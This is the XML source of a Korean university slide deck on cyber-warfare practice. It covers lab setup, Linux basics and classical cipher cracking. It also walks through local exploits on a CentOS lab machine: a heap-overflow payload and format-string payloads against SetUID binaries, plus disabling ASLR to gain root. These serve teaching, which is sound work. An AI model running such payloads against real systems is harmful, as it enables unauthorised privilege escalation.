              <a:t>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/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 실행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ /sec/heap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username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>블록과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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2064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5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>힙 버퍼 오버플로우 취약점을 이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>을 수정할 수 있음을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ /sec/heap $(python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/sec/heap $(python -c 'print "A"*112+"/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20447625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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 파일명 입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35044337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SetUID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a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8544175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/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 설정되어 있음을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># ls –l heap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/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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/sec/heap </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># ls –l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4097695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1354104123"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1356049" y="2481942"/>
          <a:ext cx="9479902" cy="2860937"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1552459">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3623680942"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1498651">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1126213368"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1688841">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="672617493"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="783771">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2343994642"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1978090">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3922511956"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1978090">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="98228301"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="70761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4~5</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분반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 </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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2206188386"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="709629">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 동아리 소개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언어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6 ~ 9 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>명</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3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>의배수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국제 프로그래밍 대회</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>(ICPC)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t> 실전 준비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ICPC </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>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709629">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심화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코드게이트</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t> 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709629">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보안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6 ~ 9 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>명</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>시스템해킹</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>웹해킹</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>리버싱</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="100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실전 문제 풀이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안보지원사 해킹대회 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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32468646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-M intel -d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(CentOS5.5)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8210927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/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>디렉터리로 이동</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ cd /sec</a:t>
            </a:r>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사용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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-M intel -d /sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> | more</a:t>
            </a:r>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7974144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/sec/</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/sec/</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주소는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> $(python -c 'print   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>       "\xd0\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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주소는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="737332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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24053029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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> $(python -c 'print</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>        "\xa0\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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3099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dirty="0"/>
              <a:t>/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> $(python -c 'print</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>       "\xa0\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2562120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및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13699609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/sec/</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(CentOS 5.5)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4272127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test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정으로 전환 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>디렉터리 이동</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> test</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ cd /sec</a:t>
            </a:r>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dirty="0" err="1">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cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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dirty="0"/>
              <a:t>$ exit</a:t>
            </a:r>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/sec/</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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34080140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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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fmtstring.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>getRoot.o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–w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>kernel.randomize_va_space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a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="155500072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6780</TotalTime>
  <Words>13841</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>3423</Paragraphs>
  <Slides>141</Slides>
  <Notes>0</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141</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="152" baseType="lpstr">
      <vt:lpstr>AppleSDGothicNeo</vt:lpstr>
      <vt:lpstr>Nanum Gothic</vt:lpstr>
      <vt:lpstr>Noto Sans</vt:lpstr>
      <vt:lpstr>Noto Sans KR</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>맑은 고딕 Semilight</vt:lpstr>
      <vt:lpstr>함초롬바탕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Source Sans Pro</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office 테마</vt:lpstr>
      <vt:lpstr>사이버전실습</vt:lpstr>
      <vt:lpstr>/  목  차</vt:lpstr>
      <vt:lpstr>/Intro  교수소개</vt:lpstr>
      <vt:lpstr>/Intro  PPT 구성</vt:lpstr>
      <vt:lpstr>/Intro  비대면 수업</vt:lpstr>
      <vt:lpstr>/Plan  강의안</vt:lpstr>
      <vt:lpstr>/Plan/Inforsec  강의안 - 정보보호</vt:lpstr>
      <vt:lpstr>/Plan/Defcybsec  강의안 – 국방 사이버 보안</vt:lpstr>
      <vt:lpstr>/Plan/Circles  문화부 계획 – 정보보호반</vt:lpstr>
      <vt:lpstr>/Environ  환경</vt:lpstr>
      <vt:lpstr>/Environ/Python  Python 설치</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Environ/WindowUpdate  윈도우 10 업데이트</vt:lpstr>
      <vt:lpstr>/Environ/WSL2  WSL2 설치</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Environ/Docker  WSL2 Docker 설치</vt:lpstr>
      <vt:lpstr>/Tool  Tool 사용법</vt:lpstr>
      <vt:lpstr>/Theory  이론</vt:lpstr>
      <vt:lpstr>/Theory/T1   사이버전 실습체계 구조</vt:lpstr>
      <vt:lpstr>/Theory/T1   단위과제 기반 실습체계</vt:lpstr>
      <vt:lpstr>/Theory/T1   시나리오 기반 실습체계</vt:lpstr>
      <vt:lpstr>/Theory/T1   공격&amp;방어 실습체계</vt:lpstr>
      <vt:lpstr>/Theory/T1   체계 구성도</vt:lpstr>
      <vt:lpstr>/Theory/T2   리눅스 기본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vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/7  7. FTP 서비스 설정</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  암호실습</vt:lpstr>
      <vt:lpstr>/Training/Cipher/1 고전암호 크래킹 – 카이사르 암호 1</vt:lpstr>
      <vt:lpstr>/Training/Cipher/1 암호문</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Cipher/2 고전암호 크래킹 – 카이사르 암호 2</vt:lpstr>
      <vt:lpstr>/Training/Cipher/2 암호문</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Appendix  부록</vt:lpstr>
      <vt:lpstr>/Appendix  해킹 시연</vt:lpstr>
      <vt:lpstr>/Appendix  해킹 관련 영상</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도우</cp:lastModifiedBy>
  <cp:revision>252</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-02-08T02:39:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-03-01T22:50:31Z</dcterms:modified>
</cp:coreProperties>
</file>